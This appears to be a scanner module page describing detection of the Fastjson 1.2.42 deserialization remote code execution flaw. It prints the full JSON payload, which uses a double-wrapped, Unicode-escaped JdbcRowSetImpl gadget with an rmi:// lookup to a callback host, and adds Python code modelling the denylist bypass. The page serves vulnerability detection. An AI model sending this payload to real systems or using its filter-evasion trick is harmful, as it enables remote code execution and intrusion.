Automate Recon and scanning process with Vidoc. All security teams in one place
By kannthu
The "Fastjson 1.2.42 - Remote Code Execution" module detects a deserialization remote code execution vulnerability in Fastjson 1.2.42. Fastjson is a Java library for parsing and generating JSON. Its autoType feature resolves a caller-supplied "@type" class name and instantiates that class, so an attacker who controls the JSON can name a gadget class such as com.sun.rowset.JdbcRowSetImpl; the payload this module sends slips that class past the denylist that version 1.2.42 applies to "@type" values.
This vulnerability is rated critical with a CVSS score of 10. It allows a remote attacker to execute arbitrary code on the host running the vulnerable application, which can lead to unauthorized access, data breaches or full system compromise.
This module was authored by zh.
The impact of the "Fastjson 1.2.42 - Remote Code Execution" vulnerability can be severe. Successful exploitation gives the attacker arbitrary code execution in the context of the Java process that parses the JSON, so everything that process can reach (its data, its credentials and its network position) is exposed, up to complete compromise of the affected system.
The "Fastjson 1.2.42 - Remote Code Execution" module works by sending a single HTTP POST whose JSON body is built to trigger the deserialization vulnerability in Fastjson 1.2.42. Three details of the payload matter. First, "@type" names com.sun.rowset.JdbcRowSetImpl, a JDK class whose setters are called by the deserializer: once dataSourceName has been set, assigning autoCommit makes the object connect, and connecting performs a JNDI lookup of the dataSourceName value. Second, dataSourceName is an rmi:// URL on the module's out-of-band callback host, so a vulnerable target reaches out to that host. Third, the class name is wrapped as LL...;; and the letters of "com" are written as JSON \u escapes. Fastjson 1.2.42 strips one leading L and one trailing ; from the name before consulting its denylist, so the double-wrapped name is not matched, while class loading strips the wrapper again and resolves the real class; the \u escapes are decoded by the JSON parser, so a filter that looks for the literal string com.sun.rowset in the request body does not see it. Note that this bypass only defeats the denylist: in 1.2.42 a class outside the accept list is loaded only when the application has enabled autoType support, so a target that does not respond to this probe is not necessarily running a patched version.
Here is the HTTP request sent by the module:
POST / HTTP/1.1
Host: {%Hostname%}
Content-Type: application/json

{
"@type":"LL\u0063\u006f\u006d.sun.rowset.JdbcRowSetImpl;;",
"dataSourceName":"rmi://{%InteractionURL%}/Exploit",
"autoCommit":true
}
The module also applies matching conditions to decide whether the vulnerability is present, and both must hold. The first condition is evaluated on the out-of-band interaction rather than on the HTTP response: the interactsh_protocol field must show that the callback host recorded an interaction from the target (a DNS lookup of the callback name is enough), which confirms that the JNDI lookup was attempted. The second condition is that the HTTP response status is not 200, which is what a vulnerable target returns when the lookup fails and the parser surfaces the resulting exception. If both conditions are met, the module reports the vulnerability.
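The following Python is an added illustration, not code from the module or from Fastjson. It models the parts of the request above that a tester should understand: how the \u escapes hide the class name from a byte-level filter while the JSON parser still sees it, why the LL...;; wrapper passes a strip-once denylist check and still resolves to the denied class, and the two matching conditions that produce the verdict. The denylist contents, the callback host name and the sample interaction record are constructed for the example, and the autoType check is a simplified model of the 1.2.42 logic (it assumes autoType support is enabled), not the library's code.

```python
import json

# Constructed for this example: Fastjson's real denylist is a set of hashes
# of class-name prefixes; a few prefix strings are enough to show the logic.
DENYLIST_PREFIXES = ("com.sun.", "java.lang.Thread")

GADGET = "com.sun.rowset.JdbcRowSetImpl"

# Body of the module's request. The letters of "com" are JSON \u escapes,
# exactly as in the template above; the doubled backslashes keep them as
# literal escape sequences so the bytes on the wire are \u0063\u006f\u006d.
PAYLOAD_TEMPLATE = (
    '{"@type":"LL\\u0063\\u006f\\u006d.sun.rowset.JdbcRowSetImpl;;",'
    '"dataSourceName":"rmi://%s/Exploit",'
    '"autoCommit":true}'
)


def build_payload(callback_host: str) -> str:
    """Return the request body with the out-of-band callback host filled in."""
    return PAYLOAD_TEMPLATE % callback_host


def type_name_seen_by_parser(body: str) -> str:
    """The @type value as Fastjson sees it after JSON decoding."""
    return json.loads(body)["@type"]


def strip_descriptor(name: str) -> str:
    """Strip one JVM descriptor wrapper: 'Lx.y.Z;' -> 'x.y.Z'."""
    if len(name) > 2 and name.startswith("L") and name.endswith(";"):
        return name[1:-1]
    return name


def is_denied(name: str) -> bool:
    """Prefix denylist check on a class name."""
    return name.startswith(DENYLIST_PREFIXES)


def check_auto_type_1_2_42(type_name: str) -> dict:
    """Simplified model of the 1.2.42 autoType check (autoType enabled).

    The check strips a single descriptor wrapper before consulting the
    denylist; the class loader that runs afterwards strips a wrapper again.
    Wrapping the name twice (LL...;;) therefore passes the check while still
    resolving to the denied class.
    """
    checked = strip_descriptor(type_name)
    if is_denied(checked):
        return {"blocked": True, "resolved": None}
    return {"blocked": False, "resolved": strip_descriptor(checked)}


def matchers_hit(status_code: int, interactions: list) -> bool:
    """The module's two matching conditions, both of which must hold:
    the callback host recorded an interaction from the target (a DNS
    lookup is enough) and the HTTP response status is not 200."""
    saw_callback = any(i.get("protocol") == "dns" for i in interactions)
    return saw_callback and status_code != 200


if __name__ == "__main__":
    body = build_payload("abc123.oast.example")  # hypothetical callback host
    print("on the wire :", body)
    print("parser sees :", type_name_seen_by_parser(body))
    for candidate in (GADGET, "L" + GADGET + ";", "LL" + GADGET + ";;"):
        print(f"{candidate:40s} -> {check_auto_type_1_2_42(candidate)}")
    # Constructed sample: the target returned 500 after a DNS lookup of the
    # callback name was recorded by the interaction server.
    sample_interactions = [{"protocol": "dns", "full-id": "abc123"}]
    print("vulnerable  :", matchers_hit(500, sample_interactions))
```

Running the block shows the plain and single-wrapped names being blocked while the double-wrapped name resolves to the gadget class, and the verdict turning true only when both the interaction and the non-200 status are present.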
It is important to note that this module is designed for vulnerability detection, not exploitation: the rmi:// reference makes the target attempt a lookup against the callback host, which confirms the vulnerable code path without serving a second-stage class. Its purpose is to identify systems that are vulnerable to the Fastjson 1.2.42 deserialization remote code execution vulnerability.
For more information, you can refer to the GitHub repository related to this vulnerability.